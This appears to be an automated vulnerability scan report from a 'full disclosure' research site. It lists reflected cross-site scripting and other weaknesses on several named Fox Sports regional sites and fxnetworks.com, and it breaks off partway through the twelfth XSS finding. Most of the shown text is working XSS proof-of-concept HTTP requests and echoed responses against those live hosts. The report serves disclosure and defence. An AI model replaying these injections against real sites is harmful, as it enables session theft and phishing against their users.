System Example, CWE-79, Fox Sports

Report of CWE-79 in Related Fox Web Properties

Report generated by CloudScan Vulnerability Crawler at Wed Jan 12 10:37:26 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Loading

1. Cross-site scripting (reflected)

1.1. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [REST URL parameter 5]

1.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [blockID parameter]

1.3. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [feedID parameter]

1.4. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [REST URL parameter 5]

1.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [blockID parameter]

1.6. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [feedID parameter]

1.7. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [REST URL parameter 5]

1.8. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [blockID parameter]

1.9. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [feedID parameter]

1.10. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [REST URL parameter 5]

1.11. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [blockID parameter]

1.12. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [feedID parameter]

1.13. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [REST URL parameter 5]

1.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [blockID parameter]

1.15. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html [feedID parameter]

1.16. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html [blockID parameter]

1.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html [feedID parameter]

1.18. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]

1.19. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]

1.20. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]

2. Cleartext submission of password

2.1. http://www.foxsportsarizona.com/

2.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

2.3. http://www.foxsportscarolinas.com/

2.4. http://www.foxsportsdetroit.com/

2.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

2.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

2.7. http://www.foxsportsflorida.com/

2.8. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

2.9. http://www.foxsportshouston.com/

2.10. http://www.foxsportskansascity.com/

2.11. http://www.foxsportsmidwest.com/

2.12. http://www.foxsportsohio.com/

2.13. http://www.foxsportssouth.com/

2.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

2.15. http://www.foxsportssouthwest.com/

2.16. http://www.foxsportstennessee.com/

2.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

2.18. http://www.foxsportswisconsin.com/

3. Cookie without HttpOnly flag set

3.1. http://www.foxsportsarizona.com/

3.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

3.3. http://www.foxsportscarolinas.com/

3.4. http://www.foxsportsdetroit.com/

3.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

3.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

3.7. http://www.foxsportsflorida.com/

3.8. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

3.9. http://www.foxsportshouston.com/

3.10. http://www.foxsportskansascity.com/

3.11. http://www.foxsportsmidwest.com/

3.12. http://www.foxsportsohio.com/

3.13. http://www.foxsportssouth.com/

3.14. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

3.15. http://www.foxsportssouthwest.com/

3.16. http://www.foxsportstennessee.com/

3.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

3.18. http://www.foxsportswisconsin.com/

4. Password field with autocomplete enabled

4.1. http://www.foxsportsarizona.com/

4.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

4.3. http://www.foxsportscarolinas.com/

4.4. http://www.foxsportsdetroit.com/

4.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

4.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

4.7. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

4.8. http://www.foxsportsflorida.com/

4.9. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

4.10. http://www.foxsportshouston.com/

4.11. http://www.foxsportskansascity.com/

4.12. http://www.foxsportsmidwest.com/

4.13. http://www.foxsportsohio.com/

4.14. http://www.foxsportssouth.com/

4.15. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

4.16. http://www.foxsportssouthwest.com/

4.17. http://www.foxsportstennessee.com/

4.18. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

4.19. http://www.foxsportswisconsin.com/

5. Cross-domain Referer leakage

5.1. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

5.2. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

5.3. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

5.4. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

5.5. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

5.6. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

6. Cross-domain script include

6.1. http://www.foxsportsarizona.com/

6.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

6.3. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

6.4. http://www.foxsportscarolinas.com/

6.5. http://www.foxsportsdetroit.com/

6.6. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

6.7. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html

6.8. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

6.9. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

6.10. http://www.foxsportsflorida.com/

6.11. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

6.12. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

6.13. http://www.foxsportshouston.com/

6.14. http://www.foxsportskansascity.com/

6.15. http://www.foxsportsmidwest.com/

6.16. http://www.foxsportsohio.com/

6.17. http://www.foxsportssouth.com/

6.18. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

6.19. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

6.20. http://www.foxsportssouthwest.com/

6.21. http://www.foxsportssupports.com/

6.22. http://www.foxsportstennessee.com/

6.23. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

6.24. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

6.25. http://www.foxsportswisconsin.com/

6.26. http://www.fxnetworks.com/

7. Email addresses disclosed

7.1. http://www.foxsportshouston.com/

7.2. http://www.foxsportsohio.com/

7.3. http://www.fxnetworks.com/

8. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 20 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a7b37<script>alert(1)</script>d888ae8c722 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.htmla7b37<script>alert(1)</script>d888ae8c722 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 16:23:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 828
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.htmla7b37<script>alert(1)</script>d888ae8c722"</strong>
...[SNIP]...

1.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55364"><script>alert(1)</script>79c7f90bbd2 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=38886355364"><script>alert(1)</script>79c7f90bbd2&feedID=3698 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=40f9bca318410e4cfa672214d5bf8092; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="38886355364"><script>alert(1)</script>79c7f90bbd2">
...[SNIP]...

1.3. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><script>alert(1)</script>16f19e0098 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698a6d4b"><script>alert(1)</script>16f19e0098 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=1a84fdcc161135e64e3d2221b0db6619; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863^feedID=3698a6d4b"><script>alert(1)</script>16f19e0098^',300,500);" rel="nofollow">
...[SNIP]...

1.4. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 93070<script>alert(1)</script>91afcaccc75 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Hoke-who/landing.html93070<script>alert(1)</script>91afcaccc75 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 16:23:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 796
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/01/11/11/Hoke-who/landing.html93070<script>alert(1)</script>91afcaccc75"</strong>
...[SNIP]...

1.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0e9"><script>alert(1)</script>e3afe52d09e was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Hoke-who/landing.html?blockID=389355de0e9"><script>alert(1)</script>e3afe52d09e&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=eec4bb8bfce9df6b5b3bbf693b14a6e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="389355de0e9"><script>alert(1)</script>e3afe52d09e">
...[SNIP]...

1.6. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba3b4"><script>alert(1)</script>d08cfb044a1 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701ba3b4"><script>alert(1)</script>d08cfb044a1 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=676319e0c3f61ef6b5113deb86066f1c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 29915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/Hoke-who/landing.html?blockID=389355^feedID=3701ba3b4"><script>alert(1)</script>d08cfb044a1^',300,500);" rel="nofollow">
...[SNIP]...

1.7. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2e935<script>alert(1)</script>eec6c3d0b68 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html2e935<script>alert(1)</script>eec6c3d0b68 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 16:23:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 825
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html2e935<script>alert(1)</script>eec6c3d0b68"</strong>
...[SNIP]...

1.8. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93b0c"><script>alert(1)</script>862f06f3aed was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=38932693b0c"><script>alert(1)</script>862f06f3aed&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:59 GMT
Server: Apache
Set-Cookie: PHPSESSID=3a8ee3bfa0fb01d31244e8ec79d23d1b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="38932693b0c"><script>alert(1)</script>862f06f3aed">
...[SNIP]...

1.9. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d02d"><script>alert(1)</script>6023c1192d was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=37018d02d"><script>alert(1)</script>6023c1192d HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:20 GMT
Server: Apache
Set-Cookie: PHPSESSID=8d89156ef6b1e184b11759f61891d912; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 25764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326^feedID=37018d02d"><script>alert(1)</script>6023c1192d^',300,500);" rel="nofollow">
...[SNIP]...

1.10. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9d8ad<script>alert(1)</script>7c51d6d03e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html9d8ad<script>alert(1)</script>7c51d6d03e9 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 16:31:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 835
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html9d8ad<script>alert(1)</script>7c51d6d03e9"</strong>
...[SNIP]...

1.11. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [blockID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8698"><script>alert(1)</script>d6ee4877b45 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962f8698"><script>alert(1)</script>d6ee4877b45&feedID=7926 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:27:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=8c572c5883268691ec62a825d06dd0da; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="388962f8698"><script>alert(1)</script>d6ee4877b45">
...[SNIP]...

1.12. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html [feedID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb111"><script>alert(1)</script>79685f9483c was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926eb111"><script>alert(1)</script>79685f9483c HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:21 GMT
Server: Apache
